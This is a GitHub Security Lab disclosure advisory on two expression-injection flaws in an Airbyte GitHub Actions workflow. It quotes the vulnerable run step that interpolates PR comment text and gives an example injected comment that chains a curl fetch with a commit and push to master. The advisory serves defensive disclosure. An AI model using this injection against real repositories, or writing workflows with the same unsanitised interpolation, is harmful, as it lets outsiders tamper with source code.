Coordinated Disclosure Timeline
- 2023-04-27: The report was sent.
- 2023-05-16: Airbyte informed us that the workflow was disabled on 2023-04-27.
Summary
Potential injection from the github.event.comment.body context, which may be controlled by an external user.
Product
Airbyte repository.
Tested Version
The master branch.
Details
Issue 1: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 111 (GHSL-2023-086)
The actions workflow file executes uncontrolled user input as part of a run command inside commands-for-testing-tool.yml. This command may allow an attacker to arbitrarily execute malicious code inside the actions runner using the permissions granted that runner.
- name: Run docker container with params
run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}
Example exploit in PR comment (pseudo code showing that an attacker could updates the repository using the GItHub actions runner):
/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master
Impact
Since the workflow runs with contents: write permissions it allows for malicious modifications of the source repository.
Resources
CodeQL query here.
Issue 2: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 55 (GHSL-2023-087)
The actions workflow file executes uncontrolled user input as part of a run command inside commands-for-testing-tool.yml. This command may allow an attacker to arbitrarily execute malicious code inside the actions runner using the permissions granted that runner.
- name: Run docker container with params
run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}
Example exploit in PR comment (pseudo code showing that an attacker could updates the repository using the GItHub actions runner):
/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master
Impact
Since the workflow runs with contents: write permissions it allows for malicious modifications of the source repository.
Credit
These issues were discovered and reported by GitHub employees @leftrightleft (Dan Shanahan) and @ngonz (Nick Gonzalez).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-086 or GHSL-2023-087 in any communication regarding these issues.